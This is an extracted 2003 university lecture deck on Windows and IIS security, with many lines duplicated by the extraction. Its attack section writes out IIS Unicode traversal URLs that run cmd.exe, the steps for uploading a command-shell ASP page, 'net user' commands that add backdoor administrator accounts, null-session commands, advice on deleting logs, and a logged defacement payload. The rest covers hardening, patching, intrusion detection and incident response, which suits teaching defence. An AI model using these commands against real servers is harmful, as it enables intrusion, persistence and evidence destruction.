windows security analysis computer science e-commerce security ‘2003’

1

Windows Security AnalysisComputer Science E-Commerce Security ‘2003’

Matthew Cookhttp://escarpment.net/

2

IntroductionIntroduction

Loughborough UniversityLoughborough Universityhttp://www.lboro.ac.uk/computing/http://www.lboro.ac.uk/computing/

Bandwidth Management Advisory ServiceBandwidth Management Advisory Servicehttp://bmas.ja.net/http://bmas.ja.net/

3

Windows Security AnalysisWindows Security Analysis

IntroductionIntroduction Step-by-step Machine CompromiseStep-by-step Machine Compromise Preventing AttackPreventing Attack Incident ResponseIncident Response Further ReadingFurther Reading

4

IntroductionIntroduction

Basic Security OverviewBasic Security Overview

5

Physical SecurityPhysical Security

Secure LocationSecure Location BIOS restrictionsBIOS restrictions Password ProtectionPassword Protection Boot DevicesBoot Devices Case LocksCase Locks Case PanelsCase Panels

6

Security ThreatsSecurity Threats

Denial of ServiceDenial of Service Theft of informationTheft of information ModificationModification Fabrication (Spoofing or Masquerading)Fabrication (Spoofing or Masquerading)

7

Security Threats…Security Threats…

Why a compromise can occur:Why a compromise can occur: Physical Security HolesPhysical Security Holes Software Security HolesSoftware Security Holes Incompatible Usage Security HolesIncompatible Usage Security Holes Social EngineeringSocial Engineering ComplacencyComplacency

8

The Easiest Security ImprovementThe Easiest Security Improvement

Good passwordsGood passwords Usernames and Passwords are the primary Usernames and Passwords are the primary

security defencesecurity defence

Use a password that is easy to type to avoid Use a password that is easy to type to avoid ‘Shoulder Surfers’‘Shoulder Surfers’

Use the first letters from song titles, song Use the first letters from song titles, song lyrics or film quotationslyrics or film quotations

9

Can you buy Security?Can you buy Security?

““This system is secure.”This system is secure.” A product vendor A product vendor might say: might say: “This product makes your “This product makes your network secure.”network secure.” Or: Or: “We secure e-“We secure e-commerce.”commerce.” Inevitably, these claims are Inevitably, these claims are naïve and simplistic. They look at the naïve and simplistic. They look at the security of the product, rather than the security of the product, rather than the security of the system. The first questions to security of the system. The first questions to ask are: ask are: “Secure from whom?”“Secure from whom?” and and “Secure against what?”“Secure against what?”

Bruce SchneierBruce Schneier

10

Step-by-step Machine Step-by-step Machine CompromiseCompromise

Why, where, how?Why, where, how?

11

BackgroundBackground

Reasons for Attack:Reasons for Attack:

Personal IssuesPersonal Issues Political StatementPolitical Statement Financial Gain (Theft of money, information)Financial Gain (Theft of money, information) Learning ExperienceLearning Experience DoS (Denial of Service)DoS (Denial of Service) Support for Illegal ActivitySupport for Illegal Activity

12

Gathering InformationGathering Information

Companies HouseCompanies House Internet SearchInternet Search

URL: URL: http://www.google.co.ukhttp://www.google.co.uk WhoisWhois

URL: URL: http://www.netsol.com/cgi-bin/whois/whoishttp://www.netsol.com/cgi-bin/whois/whois A Whois query can provide:A Whois query can provide:

– The RegistrantThe Registrant– The Domain Names RegisteredThe Domain Names Registered– The Administrative, Technical and Billing ContactThe Administrative, Technical and Billing Contact– Record updated and created date stampsRecord updated and created date stamps– DNS Servers for the DomainDNS Servers for the Domain

13

Gathering Information…Gathering Information…

Use Nslookup or digUse Nslookup or dig dig @<dns server> <machine address>dig @<dns server> <machine address> Different query type available:Different query type available:

– A – Network addressA – Network address– Any – All or Any Information availableAny – All or Any Information available– Mx – Mail exchange recordsMx – Mail exchange records– Soa – Zone of AuthoritySoa – Zone of Authority– Hinfo – Host informationHinfo – Host information– Axfr – Zone TransferAxfr – Zone Transfer– Txt – Additional stringsTxt – Additional strings

14

Identifying System WeaknessIdentifying System Weakness

Many products available:Many products available: NmapNmap NessusNessus

PandoraPandora PwdumpPwdump L0pht CrackL0pht Crack Null AuthenticationNull Authentication

15

NmapNmap

Port Scanning ToolPort Scanning Tool Stealth scanning, OS FingerprintingStealth scanning, OS Fingerprinting Open SourceOpen Source Runs under Unix based OSRuns under Unix based OS Port development for Win32Port development for Win32 URL: URL: http://www.insure.org/nmap/http://www.insure.org/nmap/

16

NmapNmap

17

NessusNessus

Remote security scannerRemote security scanner Very comprehensiveVery comprehensive Frequently updated modulesFrequently updated modules Testing of DoS attacksTesting of DoS attacks Open SourceOpen Source Win32 and Java ClientWin32 and Java Client URL: URL: http://nessus.org/http://nessus.org/

18

pwdumppwdump

Version 3 (e = encrypted)Version 3 (e = encrypted) Developed by Phil Staubs and Erik Developed by Phil Staubs and Erik

HjelmstadHjelmstad Based on pwdump and pwdump2Based on pwdump and pwdump2 URL: URL: http://www.ebiz-tech.com/html/pwdump.htmlhttp://www.ebiz-tech.com/html/pwdump.html Needs Administrative PrivilidgesNeeds Administrative Privilidges Extracts hashs even if syskey is installedExtracts hashs even if syskey is installed Extract from remote machinesExtract from remote machines Identifies accounts with no passwordIdentifies accounts with no password Self contained utilitySelf contained utility

19

L0pht CrackL0pht Crack

Password Auditing and RecoveryPassword Auditing and Recovery Crack Passwords from many sourcesCrack Passwords from many sources Registration $249Registration $249 URL: URL: http://www.atstake.com/research/lc3/http://www.atstake.com/research/lc3/

20

L0pht CrackL0pht Crack

Crack Passwords from:Crack Passwords from: Local MachineLocal Machine Remote MachineRemote Machine SAM FileSAM File SMB SnifferSMB Sniffer PWDump filePWDump file

21

Nmap AnalysisNmap Analysis

nmap –sP 158.125.0.0/16nmap –sP 158.125.0.0/16- Ping scan!Ping scan!

nmap –sS158.125.0.0/16nmap –sS158.125.0.0/16- Stealth scan- Stealth scan

22

Nmap Analysis…Nmap Analysis…

TCP Connect ScanTCP Connect Scan Completes a ‘Three Way Handshake’Completes a ‘Three Way Handshake’ Very noisy (Detection by IDS)Very noisy (Detection by IDS)

23


TCP SYN ScanTCP SYN Scan Half open scanning (Full port TCP Half open scanning (Full port TCP

connection not made)connection not made) Less noisy than the TCP Connect ScanLess noisy than the TCP Connect Scan

24


TCP FIN ScanTCP FIN Scan– FIN Packet sent to target portFIN Packet sent to target port– RST returned for all closed portsRST returned for all closed ports– Mostly works UNIX based TCP/IP StacksMostly works UNIX based TCP/IP Stacks

TCP Xmas Tree ScanTCP Xmas Tree Scan– Sends a FIN, URG and PUSH packetSends a FIN, URG and PUSH packet– RST returned for all closed portsRST returned for all closed ports

TCP Null ScanTCP Null Scan– Turns off all flagsTurns off all flags– RST returned for all closed portsRST returned for all closed ports

UDP ScanUDP Scan– UDP Packet sent to target portUDP Packet sent to target port– ““ICMP Port Unreachable” for closed portsICMP Port Unreachable” for closed ports

25

Null AuthenticationNull Authentication

Null Authentication:Null Authentication: Net use Net use \\camford\IPC$\\camford\IPC$ “” /u:“” “” /u:“” Famous tools like ‘Red Button’Famous tools like ‘Red Button’ Net view Net view \\camford\\camford

List of Users, groups and sharesList of Users, groups and shares Last logged on dateLast logged on date Last password changeLast password change Much more…Much more…

26

Exploiting the Security HoleExploiting the Security Hole

Using IIS Unicode/Directory TraversalUsing IIS Unicode/Directory Traversal /scripts/../../winnt/system32/cmd.exe /c+dir/scripts/../../winnt/system32/cmd.exe /c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Displays the listing of c: in browserDisplays the listing of c: in browser

Copy cmd.exe to /scripts/root.exeCopy cmd.exe to /scripts/root.exe Echo upload.aspEcho upload.asp GET /scripts/root.exe /c+echo+[blah]>upload.aspGET /scripts/root.exe /c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.aspUpload cmdasp.asp using upload.asp

Still vulnerable on 24% of E-Commerce serversStill vulnerable on 24% of E-Commerce servers

27

Gaining ‘Root’Gaining ‘Root’

Cmdasp.asp provides a cmd shell in the Cmdasp.asp provides a cmd shell in the SYSTEM contextSYSTEM context

Increase in privileges is now simpleIncrease in privileges is now simple

ISAPI.dll – RevertToSelf (Horovitz)ISAPI.dll – RevertToSelf (Horovitz) Version 2 coded by FoundstoneVersion 2 coded by Foundstone http://http://camford/scripts/idq.dllcamford/scripts/idq.dll? ? Patch Bulletin: MS01-26Patch Bulletin: MS01-26 NOT included in Windows 2000 SP2NOT included in Windows 2000 SP2

28

Backdoor AccessBackdoor Access

Create several user accountsCreate several user accounts Net user iisservice <pass> /ADDNet user iisservice <pass> /ADD Net localgroup administrators iisservice /ADDNet localgroup administrators iisservice /ADD Add root shells on high end portsAdd root shells on high end ports Tiri is 3Kb in sizeTiri is 3Kb in size Add backdoors to ‘Run’ registry keys Add backdoors to ‘Run’ registry keys

29

System AlterationSystem Alteration

Web page alterationWeb page alteration Information TheftInformation Theft Enable servicesEnable services Add VNCAdd VNC

Creating a Warez ServerCreating a Warez Server Net start msftpsvcNet start msftpsvc Check accessCheck access Upload file 1Mb in sizeUpload file 1Mb in size Advertise as a warez server Advertise as a warez server

30

Audit Trail RemovalAudit Trail Removal

Many machines have auditing disabledMany machines have auditing disabled Main problems are IIS logsMain problems are IIS logs DoS IIS before logs sync to discDoS IIS before logs sync to disc Erase logs from hard discErase logs from hard disc Erasing Eventlog harderErasing Eventlog harder

IDS SystemsIDS Systems Network Monitoring at firewallNetwork Monitoring at firewall

31

Preventing AttackPreventing Attack

How to stop the attack from How to stop the attack from happening and how to limit the happening and how to limit the

damage from crackers!damage from crackers!

32

NetBIOS/SMB ServicesNetBIOS/SMB Services

NetBIOS Browsing Request [UDP 137]NetBIOS Browsing Request [UDP 137] NetBIOS Browsing Response [UDP 138]NetBIOS Browsing Response [UDP 138] NetBIOS Communications [TCP 135]NetBIOS Communications [TCP 135] CIFS [TCP 139, 445 UDP 445]CIFS [TCP 139, 445 UDP 445] Port 445 Windows 2000 onlyPort 445 Windows 2000 only Block ports at firewallBlock ports at firewall Netstat -ANetstat -A

33

NetBIOS/SMB Services…NetBIOS/SMB Services…

To disable NetBIOSTo disable NetBIOS1.1. Select ‘Disable NetBIOS’ in the WINS tab Select ‘Disable NetBIOS’ in the WINS tab

of advanced TCP/IP properties.of advanced TCP/IP properties.2.2. Deselect ‘File and Print sharing’ in the Deselect ‘File and Print sharing’ in the

advanced settings of the ‘Network and Dial-advanced settings of the ‘Network and Dial-up connections’ windowup connections’ window

34

NetBIOS/SMB Services…NetBIOS/SMB Services…

Disable Null AuthenticationDisable Null Authentication HKLM\SYSTEM\CurrentControlSet\Control\LSA\HKLM\SYSTEM\CurrentControlSet\Control\LSA\

RestrictAnonymousRestrictAnonymous REG_DWORD set to 0, 1 or REG_DWORD set to 0, 1 or 2!2! HKLM\SYSTEM\CurrentControlSet\Control\HKLM\SYSTEM\CurrentControlSet\Control\

SecurePipeServers\RestrictAnonymousSecurePipeServers\RestrictAnonymous REG_DWORD set to 0 or 1REG_DWORD set to 0 or 1

35

Operating System PatchingOperating System Patching

Operating Systems do contain bugs, and Operating Systems do contain bugs, and patches are a common method of distributing patches are a common method of distributing these fixes.these fixes.

A patch or hot fix usually contains a fix for A patch or hot fix usually contains a fix for one discovered bug.one discovered bug.

Service packs contain multiple patches or Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows the soon to be released SP4 for Windows 2000.2000.

36

Operating System Patching…Operating System Patching…

Only install patches after you have tested Only install patches after you have tested them in a development environment.them in a development environment.

Only install patches obtained direct from the Only install patches obtained direct from the vendor.vendor.

Install security patches as soon as possible Install security patches as soon as possible after released.after released.

Install feature patches as and when needed.Install feature patches as and when needed. Automate patch collection and installation as Automate patch collection and installation as

much as possible (QChain).much as possible (QChain).

37

Operating System Patching…Operating System Patching…

Use automated patching technology:Use automated patching technology: SUS – Microsoft Software Update ServiceSUS – Microsoft Software Update Service SMS – Microsoft Systems Management ServerSMS – Microsoft Systems Management Server Ghost – Symantec imaging software.Ghost – Symantec imaging software.

And other application deployment software:And other application deployment software: Lights out DistributionLights out Distribution Deferred installationDeferred installation

38

Baseline Security AnalyzerBaseline Security Analyzer

Freely available from MicrosoftFreely available from Microsoft Written by Shavlik Technologies as a direct Written by Shavlik Technologies as a direct

result of Code Red attacksresult of Code Red attacks

A GUI to HFNetChk (v3.81)A GUI to HFNetChk (v3.81) Improved feature setImproved feature set Integrated SUS functionalityIntegrated SUS functionality

39

Baseline Security Analyzer…Baseline Security Analyzer…

MBSA v1.1 supports the following host OS:MBSA v1.1 supports the following host OS: Windows 2000 Professional / ServerWindows 2000 Professional / Server Windows XP Home / ProfessionalWindows XP Home / Professional

Windows .NET not officially supportedWindows .NET not officially supported Windows NT not supported as host OSWindows NT not supported as host OS

Remote scanning availableRemote scanning available

40

Baseline Security Analyzer…Baseline Security Analyzer…

What applications does MBSA scan?What applications does MBSA scan? Operating systemOperating system Internet Explorer > 5.01Internet Explorer > 5.01 Microsoft Office 2000 and 2002Microsoft Office 2000 and 2002 Media Player > 6.4Media Player > 6.4 Internet Information Services 4.0 and 5.0Internet Information Services 4.0 and 5.0 SQL Server 7.0 and 2000SQL Server 7.0 and 2000 Exchange Server 5.5 and 2000Exchange Server 5.5 and 2000

41

IPSecIPSec

IP securityIP security Linux Connectivity using FreeS/WANLinux Connectivity using FreeS/WAN Mainly for wireless useMainly for wireless use WEP encryption crackedWEP encryption cracked URL: URL: http://www.freeswan.org/http://www.freeswan.org/ URL: URL: http://airsnort.sourceforge.net/http://airsnort.sourceforge.net/

42

Recent WormsRecent Worms

Sadmind/IISSadmind/IISDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)

CodeRedCodeRedida/idq buffer overflowida/idq buffer overflow

CodeGreenCodeGreen ida/idq buffer overflow ida/idq buffer overflow

NimdaNimdaDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)

SlammerSlammerMS SQL Server transaction controlMS SQL Server transaction control

43

Sadmind/IISSadmind/IIS

2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22centerfont^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -html^>>../wwwroot/default.htm 200 -

44

IDS SnortIDS Snort

IDS – Intrusion Detection SystemIDS – Intrusion Detection System Libpcap packet sniffer and loggerLibpcap packet sniffer and logger Originally developed for the Unix platformsOriginally developed for the Unix platforms Open SourceOpen Source Port to Win32 available (Release 1.8.1)Port to Win32 available (Release 1.8.1) Installation on Win32 in under 30 minutesInstallation on Win32 in under 30 minutes Run on your IIS server or standaloneRun on your IIS server or standalone

45

IDS Snort…IDS Snort…

Snort can detect:Snort can detect: Stealth Port ScansStealth Port Scans CGI AttacksCGI Attacks Front Page Extensions AttacksFront Page Extensions Attacks ICMP ActivityICMP Activity SMTP ActivitySMTP Activity SQL ActivitySQL Activity SMB ProbesSMB Probes

46

Incident ResponseIncident Response

What to do when something does What to do when something does go wrong!go wrong!

47

Incident Response…Incident Response…

Don’t Panic!Don’t Panic! Unplug the networkUnplug the network Get a notebookGet a notebook Back-up the system and keep the Back-upsBack-up the system and keep the Back-ups Restrict use of emailRestrict use of email Look for informationLook for information Investigate the causeInvestigate the cause

Request help and assistance.Request help and assistance.

48

Incident Response…Incident Response…

Important to return to service swiftlyImportant to return to service swiftly– Do not jeopardize securityDo not jeopardize security– If in doubt, re-buildIf in doubt, re-build– Perform forensics on a backupPerform forensics on a backup

Keep documentation and evidenceKeep documentation and evidence Contact local CERT if investigation proves Contact local CERT if investigation proves

non worm/script kiddie activity.non worm/script kiddie activity.

49

Further ReadingFurther Reading

Garfinkel, S. Web Security & CommerceGarfinkel, S. Web Security & CommerceO’ReillyO’Reilly [ISBN 1-56592-269-7] [ISBN 1-56592-269-7]

Hassler, V. Security Fundamentals for E-Hassler, V. Security Fundamentals for E-Commerce Commerce Artech HouseArtech House [ISBN 1-58053-108-3] [ISBN 1-58053-108-3]

Huth, M R A. Secure Communicating Systems Huth, M R A. Secure Communicating Systems Cambridge Uni PressCambridge Uni Press [ISBN 0-52180-731-X] [ISBN 0-52180-731-X]

Schneier, B. Schneier, B. Secrets & Lies (Digital Security in Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]a Networked World) [ISBN 0-47125-311-1]

50

Useful Books, Tools and URLsUseful Books, Tools and URLs

Securing Windows NT/2000 Servers for the Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.)Internet. (Stefan Norberg.)

Incident Response. (Kenneth R. van Wyk, Incident Response. (Kenneth R. van Wyk, Richard Forno.)Richard Forno.)

Hacking Exposed: Network Security Secrets Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al)& Solutions. (Stuart McClure et al)

Hacking Exposed Windows 2000: Network Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)Security Secrets and Solutions. (Scambray.)

51

Useful Books, Tools and URLsUseful Books, Tools and URLs

Microsoft Security WebsiteMicrosoft Security Websitehttp://www.microsoft.com/security/http://www.microsoft.com/security/

Computer Security Incident Response TeamComputer Security Incident Response Teamhttp://www.cert.org/csirts/csirt_faq.htmlhttp://www.cert.org/csirts/csirt_faq.html

JANET CERTJANET CERThttp://www.ja.net/cert/http://www.ja.net/cert/

Bugtraq Mailing ListBugtraq Mailing Listhttp://http://online.securityfocus.comonline.securityfocus.com//

52

QuestionsQuestions

Slides available at:Slides available at:http://escarpment.net/http://escarpment.net/

windows security analysis computer science e-commerce security ‘2003’

Documents